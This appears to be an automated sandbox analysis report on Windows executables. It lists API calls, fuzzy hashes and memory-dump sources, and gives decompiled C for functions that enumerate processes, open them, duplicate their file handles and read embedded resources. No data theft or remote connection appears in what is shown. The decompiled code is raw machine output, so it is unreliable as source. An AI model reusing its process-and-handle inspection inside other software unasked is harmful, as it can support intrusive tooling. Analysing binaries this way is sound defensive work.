Instruction Fuzzy Hash: 1DF01270A85304AFF710ABB69C16F7636989319B15F10527BFB0C5A2E1D7F82448862D

Uniqueness

Uniqueness Score: -1.00%

Function 004302E4, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004302F0
SelectObject.GDI32(00000000,00000000), ref: 00430308
GetTextMetricsA.GDI32(00000000,?), ref: 00430319
ReleaseDC.USER32 ref: 0043032E

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 2eeb952aa4d6e41f0e36b51d1927c3fcf18e09a1702456de8e67e366a9c23c6e
Instruction ID: fa287c75732a01fd1236cd78c8dce672495d71be1f5d761aeb03f398afcf5c50
Opcode Fuzzy Hash: 2eeb952aa4d6e41f0e36b51d1927c3fcf18e09a1702456de8e67e366a9c23c6e
Instruction Fuzzy Hash: BDF090209082486BCF40DBE88855BEEBBBC9B08304F4401D6BD44E7381D6799A45C775

Uniqueness

Uniqueness Score: -1.00%

Function 0041D0B4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

GetClipBox.GDI32(?,?), ref: 0041D1F9

Part of subcall function 00428848: CreateBrushIndirect.GDI32(?), ref: 00428902

FillRect.USER32 ref: 0041D12D

Strings

cB, xrefs: 0041D0D6

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: BrushClipCreateFillIndirectRect
String ID: cB
API String ID: 3700415802-842239044
Opcode ID: 669f5765d1bbafd023574166201e3ebd8805bf6f9f916450e9fc1a5a872d738e
Instruction ID: 8f40ead8f9484484cbabf4eaed67aa87196ba89017883778f1dc478286cc675a
Opcode Fuzzy Hash: 669f5765d1bbafd023574166201e3ebd8805bf6f9f916450e9fc1a5a872d738e
Instruction Fuzzy Hash: FB814B79A01608DFCB10DFA9D58999DBBF5FF08315B1081AAE848EB321D734AE84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 0040B151

Strings

Failed to create process, xrefs: 0040B165
D, xrefs: 0040B100

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateProcess
String ID: D$Failed to create process
API String ID: 963392458-1258605896
Opcode ID: 780be20314a0d2b63e1e824ce44d52908c1a93b6d020ae752db27ff91ae3e44b
Instruction ID: e94c8b8d0d65273dfb6aa4984165174d955d846181e10d4deb4480dec581f5b9
Opcode Fuzzy Hash: 780be20314a0d2b63e1e824ce44d52908c1a93b6d020ae752db27ff91ae3e44b
Instruction Fuzzy Hash: CF41FA70D00208ABDB04DF95C846BDDB7B5FF58318F14C12AE914AB391DB789A45CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0042414C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 00424159
GetMenuState.USER32 ref: 004241BB

Strings

@, xrefs: 004241D9

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItemState
String ID: @
API String ID: 4031802062-2766056989
Opcode ID: 6bc8244a8edb859136a729b17e7a612c45c33f896f7e233d6b96bb69a0faa40a
Instruction ID: 6e995326d4553103c8ecdece291b54a4172d80e15fb699095ec591e9e1d3d957
Opcode Fuzzy Hash: 6bc8244a8edb859136a729b17e7a612c45c33f896f7e233d6b96bb69a0faa40a
Instruction Fuzzy Hash: 2D31C374A04249EFDB01DBE8C884BAEBBF4EF19314F1440C5E994AB391C374AA80CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00404264, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 0040432F

Strings

\DeltaCopy.chm, xrefs: 004042C2
open, xrefs: 00404321

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: \DeltaCopy.chm$open
API String ID: 587946157-1452956351
Opcode ID: 08639d5264c99546fcc59c5e62afc49716f36361ea36d944da2767d13a8fa261
Instruction ID: c45f386a0b9dde34bbce0049a019cafd701c3fdea6aa4fe8d67565f44aae1750
Opcode Fuzzy Hash: 08639d5264c99546fcc59c5e62afc49716f36361ea36d944da2767d13a8fa261
Instruction Fuzzy Hash: 28213370D1014DDBCF00EBA1D846AEEB7B8EF45308F10447BE900A7252E7385A55CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407120, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00010006), ref: 0040714D
GetLastError.KERNEL32(00000000,00000000,00010006), ref: 00407161

Strings

YK, xrefs: 00407126

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastManagerOpen
String ID: YK
API String ID: 2571844144-1850141337
Opcode ID: 1329e81f18e9e966ca6c425d18baa9f2b4f0989554e2b078272fa6e52aeb0037
Instruction ID: 190100b287aa14d7e2bb6de1dbcb8283dd5bf0deefe667bc718d10f88c48b48f
Opcode Fuzzy Hash: 1329e81f18e9e966ca6c425d18baa9f2b4f0989554e2b078272fa6e52aeb0037
Instruction Fuzzy Hash: 87F0D034A442089FD710DF59C842B9DB7A0EF08754F508169F90C9B381E775AD818B9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1612058829275.exe PID: 5644 Parent PID: 4088 1612058829275.exeCOMMON

Executed Functions

Function 0040CE93, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 122
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				void _v1102;
				void* _v1104;
				intOrPtr _v1636;
				long _v1652;
				void _v1656;
				void* _v1660;
				void* __edi;
				void* __esi;
				void* _t42;
				int _t47;
				long _t50;
				void* _t51;
				void* _t57;
				struct HINSTANCE__* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t79;
				void* _t84;
				void* _t85;
				void* _t86;

				_t79 = _a4;
				_t2 = _t79 + 0x2c; // 0x40c800
				E00403F55(_t2);
				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t42;
				memset( &_v1656, 0, 0x228);
				_t85 = _t84 + 0xc;
				_v1660 = 0x22c;
				Process32FirstW(_v12,  &_v1660); // executed
				while(1) {
					_t47 = Process32NextW(_v12,  &_v1660); // executed
					if(_t47 == 0) {
						break;
					}
					E0040C997( &_v580);
					_t50 = _v1652;
					_v580 = _t50;
					_v52 = _v1636;
					_t51 = OpenProcess(0x410, 0, _t50);
					__eflags = _t51;
					_v8 = _t51;
					if(_t51 != 0) {
						L4:
						_v1104 = 0;
						memset( &_v1102, 0, 0x208);
						_t86 = _t85 + 0xc;
						E0040D049(_t79, _v8,  &_v1104);
						__eflags = _v1104;
						if(_v1104 == 0) {
							L6:
							__eflags =  *0x4136ec; // 0x1
							_v16 = 0x104;
							if(__eflags == 0) {
								_t69 = GetModuleHandleW(L"kernel32.dll");
								__eflags = _t69;
								if(_t69 != 0) {
									 *0x4136ec = 1;
									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
								}
							}
							_t57 =  *0x4136f0;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
							}
							L11:
							E0040CAF2( &_v576,  &_v1104);
							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t85 = _t86 + 0x14;
							CloseHandle(_v8);
							_t79 = _a4;
							L12:
							_t37 = _t79 + 0x2c; // 0x40c800
							E0040D0D3(_t37,  &_v580);
							continue;
						}
						__eflags = _v1104 - 0x3f;
						if(_v1104 != 0x3f) {
							goto L11;
						}
						goto L6;
					}
					_t71 = E004058FB();
					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
						goto L12;
					}
					_t72 = OpenProcess(0x1000, 0, _v580);
					__eflags = _t72;
					_v8 = _t72;
					if(_t72 == 0) {
						goto L12;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x0040ce9f
0x0040cea2
0x0040cea5
0x0040ceaf
0x0040ceb9
0x0040cec4
0x0040cec9
0x0040ced6
0x0040cee0
0x0040d022
0x0040d02c
0x0040d033
0x00000000
0x00000000
0x0040cef0
0x0040cef5
0x0040cf0e
0x0040cf14
0x0040cf17
0x0040cf19
0x0040cf1b
0x0040cf1e
0x0040cf48
0x0040cf55
0x0040cf5c
0x0040cf61
0x0040cf70
0x0040cf75
0x0040cf7c
0x0040cf88
0x0040cf88
0x0040cf8e
0x0040cf95
0x0040cf9c
0x0040cfa2
0x0040cfa4
0x0040cfac
0x0040cfbc
0x0040cfbc
0x0040cfa4
0x0040cfc1
0x0040cfc6
0x0040cfc8
0x0040cfd9
0x0040cfd9
0x0040cfdb
0x0040cfe7
0x0040cfff
0x0040d004
0x0040d00a
0x0040d010
0x0040d013
0x0040d01a
0x0040d01d
0x00000000
0x0040d01d
0x0040cf7e
0x0040cf86
0x00000000
0x00000000
0x00000000
0x0040cf86
0x0040cf20
0x0040cf25
0x0040cf29
0x00000000
0x00000000
0x0040cf3b
0x0040cf3d
0x0040cf3f
0x0040cf42
0x00000000
0x00000000
0x00000000
0x0040cf42
0x0040d046

APIs

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
memset.MSVCRT ref: 0040CEC4
Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
memset.MSVCRT ref: 0040CF5C
GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
CloseHandle.KERNEL32(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C

Strings

?, xrefs: 0040CF7E
QueryFullProcessImageNameW, xrefs: 0040CFA6
kernel32.dll, xrefs: 0040CF97

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: ?$QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1549906504
Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D071, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D071(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryW(L"psapi.dll"); // executed
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[4] = _t14;
					return _t14;
				}
				return _t7;
			}

0x0040d074
0x0040d07c
0x0040d08e
0x0040d099
0x0040d0a5
0x0040d0b1
0x0040d0bd
0x0040d0c9
0x0040d0cc
0x0040d0ce
0x00000000
0x0040d0d1
0x0040d0d2

APIs

LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,74B059F0,0040CF75,?,?), ref: 0040D07C
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC

Strings

GetModuleFileNameExW, xrefs: 0040D0AA
EnumProcessModules, xrefs: 0040D092
EnumProcesses, xrefs: 0040D0B6
EnumProcessModulesEx, xrefs: 0040D09E
psapi.dll, xrefs: 0040D077
GetModuleBaseNameW, xrefs: 0040D088
GetModuleInformation, xrefs: 0040D0C2

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2238633743-4233621989
Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6FB, Relevance: 19.7, APIs: 13, Instructions: 207
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				int _v44;
				intOrPtr _v48;
				int _v52;
				char _v56;
				int _v60;
				intOrPtr _v64;
				int _v68;
				char _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				int _v100;
				void _v622;
				short _v624;
				char _v1616;
				void _v1623;
				char _v1624;
				void* __esi;
				void* _t97;
				void* _t99;
				long _t101;
				intOrPtr _t102;
				void* _t110;
				void* _t111;
				void* _t114;
				void* _t116;
				void* _t128;
				void* _t131;
				signed char* _t152;
				void* _t153;
				void** _t154;
				void*** _t155;
				intOrPtr _t158;
				signed short* _t159;
				void* _t163;
				void* _t164;
				void* _t165;

				_t165 = __eflags;
				_t155 = __eax;
				_v28 = 0;
				_v32 = 0;
				_v624 = 0;
				memset( &_v622, 0, 0x208);
				E00405800( &_v624);
				_t164 = _t163 + 0x10;
				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v12 = _t97;
				_t99 = E0040C572(_t155, _t165); // executed
				_v16 = _t99;
				FindCloseChangeNotification(_v12); // executed
				_t154 =  *_t155;
				_t101 = GetCurrentProcessId();
				if(_v16 == 0) {
					_t153 =  *_t154;
					if(_t153 > 0) {
						_t152 =  &(_t154[2]);
						do {
							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
								_v32 =  *_t152 & 0x000000ff;
							}
							_t152 =  &(_t152[0x10]);
							_t153 = _t153 - 1;
							_t170 = _t153;
						} while (_t153 != 0);
					}
				}
				_t102 = 0x20;
				_v64 = _t102;
				_v48 = _t102;
				_v72 = 0;
				_v60 = 0;
				_v68 = 0;
				_v56 = 0;
				_v44 = 0;
				_v52 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0040CE93(_t153, _t170,  &_v100); // executed
				_v20 = 0;
				if(_v44 > 0) {
					do {
						_t110 = E0040C982(_v20,  &_v56);
						_t36 = _t110 + 4; // 0x4
						_v12 = _t110;
						_t111 = E00405888(_t36);
						_t158 = _a4;
						_v16 = _t111;
						_v8 = 0;
						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
							goto L26;
						} else {
							while(1) {
								_t114 = E00406306(_t158, _v8);
								_push(_v16);
								_push(_t114);
								L0040E03E();
								if(_t114 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
									continue;
								} else {
									goto L26;
								}
								goto L27;
							}
							_t116 = OpenProcess(0x40, 0,  *_v12);
							__eflags = _t116;
							_v16 = _t116;
							if(_t116 != 0) {
								__eflags =  *_t154;
								_v24 = 0;
								if( *_t154 > 0) {
									_t159 =  &(_t154[1]);
									do {
										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
										if(( *_t159 & 0x0000ffff) !=  *_v12) {
											goto L21;
										} else {
											__eflags = (_t159[2] & 0x000000ff) - _v32;
											if((_t159[2] & 0x000000ff) != _v32) {
												goto L21;
											} else {
												_v8 = 0;
												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
												__eflags = _v8;
												if(_v8 == 0) {
													goto L21;
												} else {
													_v1624 = 0;
													memset( &_v1623, 0, 0x3e7);
													_t164 = _t164 + 0xc;
													_v36 = 0;
													E0040C41D();
													_t128 =  *0x4132a8;
													__eflags = _t128;
													if(_t128 != 0) {
														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
													}
													CloseHandle(_v8);
													_v40 = E00405888( &_v1616);
													_t131 = E00405888(_a8);
													_push(_t131);
													_push(_v40);
													L0040E03E();
													__eflags = _t131;
													if(_t131 == 0) {
														 *_a12 =  *_v12;
														_v28 = 1;
														 *_a16 = _t159[3] & 0x0000ffff;
													} else {
														goto L21;
													}
												}
											}
										}
										goto L24;
										L21:
										_v24 = _v24 + 1;
										_t159 =  &(_t159[8]);
										__eflags = _v24 -  *_t154;
									} while (_v24 <  *_t154);
								}
								L24:
								CloseHandle(_v16);
							}
							__eflags = _v28;
							if(_v28 == 0) {
								goto L26;
							}
						}
						goto L27;
						L26:
						_v20 = _v20 + 1;
					} while (_v20 < _v44);
				}
				L27:
				if(_v100 != 0) {
					FreeLibrary(_v100); // executed
					_v100 = 0;
				}
				E00403F55( &_v56);
				E00403F55( &_v72);
				return _v28;
			}

0x0040c6fb
0x0040c70e
0x0040c718
0x0040c71b
0x0040c71e
0x0040c725
0x0040c731
0x0040c736
0x0040c74c
0x0040c752
0x0040c757
0x0040c75f
0x0040c762
0x0040c768
0x0040c76a
0x0040c773
0x0040c775
0x0040c779
0x0040c77b
0x0040c77e
0x0040c784
0x0040c792
0x0040c792
0x0040c795
0x0040c798
0x0040c798
0x0040c798
0x0040c77e
0x0040c779
0x0040c79d
0x0040c79e
0x0040c7a1
0x0040c7a8
0x0040c7ab
0x0040c7ae
0x0040c7b1
0x0040c7b4
0x0040c7b7
0x0040c7ba
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c7c6
0x0040c7c9
0x0040c7cc
0x0040c7cf
0x0040c7d7
0x0040c7da
0x0040c7e0
0x0040c7e6
0x0040c7eb
0x0040c7ee
0x0040c7f1
0x0040c7f6
0x0040c7fc
0x0040c7ff
0x0040c802
0x00000000
0x0040c808
0x0040c808
0x0040c80d
0x0040c812
0x0040c815
0x0040c816
0x0040c81f
0x00000000
0x00000000
0x0040c821
0x0040c82a
0x00000000
0x0040c82c
0x00000000
0x0040c82c
0x00000000
0x0040c82a
0x0040c839
0x0040c83f
0x0040c841
0x0040c844
0x0040c84a
0x0040c84c
0x0040c84f
0x0040c855
0x0040c858
0x0040c85e
0x0040c860
0x00000000
0x0040c866
0x0040c86a
0x0040c86d
0x00000000
0x0040c873
0x0040c87f
0x0040c891
0x0040c897
0x0040c89a
0x00000000
0x0040c89c
0x0040c8a9
0x0040c8af
0x0040c8b4
0x0040c8b7
0x0040c8ba
0x0040c8bf
0x0040c8c4
0x0040c8c6
0x0040c8dd
0x0040c8dd
0x0040c8e2
0x0040c8f6
0x0040c8f9
0x0040c8fe
0x0040c8ff
0x0040c902
0x0040c907
0x0040c90b
0x0040c928
0x0040c931
0x0040c938
0x00000000
0x00000000
0x00000000
0x0040c90b
0x0040c89a
0x0040c86d
0x00000000
0x0040c90d
0x0040c90d
0x0040c913
0x0040c916
0x0040c916
0x0040c91e
0x0040c93a
0x0040c93d
0x0040c93d
0x0040c943
0x0040c946
0x00000000
0x00000000
0x0040c946
0x00000000
0x0040c948
0x0040c948
0x0040c94e
0x0040c7e0
0x0040c957
0x0040c95a
0x0040c95f
0x0040c965
0x0040c965
0x0040c96b
0x0040c973
0x0040c97f

APIs

memset.MSVCRT ref: 0040C725

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
_wcsicmp.MSVCRT ref: 0040C816
OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
memset.MSVCRT ref: 0040C8AF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
_wcsicmp.MSVCRT ref: 0040C902
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
String ID:
API String ID: 832456665-0
Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9FC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x412b10; // 0x10350e5a
								 *0x412b10 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040da09
0x0040da0f
0x0040da13
0x0040da20
0x0040da24
0x0040da2a
0x0040da32
0x0040da35
0x0040da3d
0x0040da41
0x0040da44
0x0040da47
0x0040da49
0x0040da49
0x0040da4d
0x0040da50
0x0040da60
0x0040da62
0x0040da66
0x0040da66
0x0040da6a
0x0040da6b
0x0040da74
0x0040da74
0x0040da3d
0x0040da32
0x0040da79
0x0040da7f

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
